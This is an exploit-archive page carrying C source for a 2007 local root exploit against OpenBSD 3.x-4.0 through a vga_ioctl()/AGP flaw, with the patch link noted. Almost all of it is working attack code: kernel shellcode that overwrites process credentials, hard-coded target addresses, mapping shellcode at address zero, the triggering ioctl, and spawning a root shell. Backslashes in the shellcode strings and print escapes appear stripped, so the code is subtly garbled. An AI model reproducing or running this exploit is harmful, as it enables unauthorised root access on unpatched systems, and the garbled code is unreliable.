[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : OpenBSD 3.x - 4.0 vga_ioctl() Local Root Exploit
# Published : 2007-01-07
# Author : Critical Security
# Previous Title : Kaspersky Antivirus 6.0 Local Privilege Escalation Exploit
# Next Title : Application Enhancer (APE) 2.0.2 Local Privilege Escalation Exploit
/*
Critical Security OpenBSD 3.x-4.0 vga_ioctl() root exploit
Bug had been discovered by allmighty Ilja van Sprundel (ilja.netric.org)
Some code had been stolen from noir's openbsd exploit sources
Fix is available:
ftp://ftp.openbsd.org/pub/OpenBSD/patches/4.0/i386/007_agp.patch
Critical Security [http://www.critical.lt], Lithuania, Vilnius, 2007
Linkejimai neegzistuojancio fronto kariams ;]
*/
#include <sys/param.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <sys/agpio.h>
#include <unistd.h>
#include <err.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/sysctl.h>
#define TARGET1 "x51x47x48xd0" /* 0xd0484751 obsd 4.0 generic i386*/
#define TARGET2 "xa9x42x10xd0" /* 0xd01042a9 obsd 3.9 generic i386*/
char shellcode[]=
"x18x00x00x00"
"x18x00x00x00"
"x18x00x00x00" /* some crap */
"x18x00x00x00"
"x18x00x00x00"
"x18x00x00x00" /* jmp 0x00000018 */
"xe8x0fx00x00x00x78x56x34x12xfexcaxad"
"xdexadxdexefxbex90x90x90x5fx8bx0fx8b" /* p_cred & u_cred shellcode */
"x59x10x31xc0x89x43x04x8bx13x89x42x04"
"xb8x51x47x48xd0"
"xffxe0";
void usage()
{
printf("Usage: crit_obsd_ex targetnn");
printf("valid targets:n");
printf("(1)tobsd 4.0 generic i386n");
printf("(2)tobsd 3.9 generic i386nn");
exit(0);
}
void get_proc(pid_t pid, struct kinfo_proc *kp)
{
u_int arr[4], len;
arr[0] = CTL_KERN;
arr[1] = KERN_PROC;
arr[2] = KERN_PROC_PID;
arr[3] = pid;
len = sizeof(struct kinfo_proc);
if(sysctl(arr, 4, kp, &len, NULL, 0) < 0) {
perror("sysctl");
printf("this is an unexpected error, rerun!n");
exit(-1);
}
}
int main(int ac, char *av[])
{
int i;
void *p;
int fd,failas;
u_long pprocadr;
struct kinfo_proc kp;
printf("n+--------------------------------------------+n");
printf("| Critical Security local obsd root |n");
printf("+--------------------------------------------+nn");
if (ac<2) usage();
if(atoi(av[1])==1)
{
for(i=0;i<4;i++)shellcode[61+i]=TARGET1[i];
}
else if(atoi(av[1])==2)
{
for(i=0;i<4;i++)shellcode[61+i]=TARGET2[i];
}
else {usage();}
get_proc((pid_t) getpid(), &kp);
pprocadr = (u_long) kp.kp_eproc.e_paddr;
shellcode[24+5] = pprocadr & 0xff;
shellcode[24+6] = (pprocadr >> 8) & 0xff;
shellcode[24+7] = (pprocadr >> 16) & 0xff;
shellcode[24+8] = (pprocadr >> 24) & 0xff;
printf("[~] shellcode size: %dn",sizeof(shellcode));
fd=open("/tmp/. ", O_RDWR|O_CREAT, S_IRUSR|S_IWUSR);
if(fd < 0)
err(1, "open");
write(fd, shellcode, sizeof(shellcode));
if((lseek(fd, 0L, SEEK_SET)) < 0)
err(1, "lseek");
p=mmap(0, sizeof(shellcode), PROT_READ|PROT_EXEC, MAP_FIXED, fd, 0);
if (p == MAP_FAILED)
err(1, "mmap");
printf("[~] map addr: 0x%xn",p);
printf("[~] exploiting...n");
failas = open(AGP_DEVICE, O_RDWR);
syscall(SYS_ioctl, failas, 0x80044103, NULL);
close(failas);
close(fd);
seteuid(0);
setuid(0);
printf("[~] uid: %d euid: %d gid: %d n", getuid(), geteuid(),getgid());
execl("/bin/sh", "cyber", NULL);
}
// www.Syue.com [2007-01-07]